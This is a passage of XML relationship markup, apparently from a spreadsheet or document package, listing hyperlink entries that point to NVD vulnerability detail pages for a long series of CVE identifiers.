Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78658" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79725" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86332" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87454" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9138" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9186" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9225" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9336" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9745" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19634" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3853" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54743" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66760" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72881" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83534" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62718" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25552" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43980" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50544" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5588" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61807" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63335" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63642" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69243" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70597" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73411" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73412" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83610" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84969" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85167" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88859" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9327" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68499" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71429" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71430" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81859" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86314" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86315" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-24291" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51684" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18562" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22029" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32773" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47883" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47887" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50980" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52232" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52370" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52773" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52774" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55087" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61526" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63670" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71478" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73084" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75170" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79419" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80180" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80190" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8447" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85227" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85229" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88023" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88024" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88025" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88029" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88030" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88031" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88033" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88034" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88036" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-6717" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0294" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58139" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65985" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70603" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79780" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-4971" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-8039" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0307" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32637" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52739" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55854" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55856" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55857" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55858" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55859" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55860" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58237" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58238" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66776" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66777" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70599" TargetMode="External" Id="rId1696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70605" TargetMode="External" Id="rId1697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70606" TargetMode="External" Id="rId1698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78123" TargetMode="External" Id="rId1700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78221" TargetMode="External" Id="rId1701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84185" TargetMode="External" Id="rId1703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId1704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId1705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84970" TargetMode="External" Id="rId1706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85014" TargetMode="External" Id="rId1707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId1708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87123" TargetMode="External" Id="rId1709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88763" TargetMode="External" Id="rId1710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9036" TargetMode="External" Id="rId1711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9744" TargetMode="External" Id="rId1712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0306" TargetMode="External" Id="rId1713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69129" TargetMode="External" Id="rId1714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72764" TargetMode="External" Id="rId1716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73243" TargetMode="External" Id="rId1717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74866" TargetMode="External" Id="rId1718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84193" 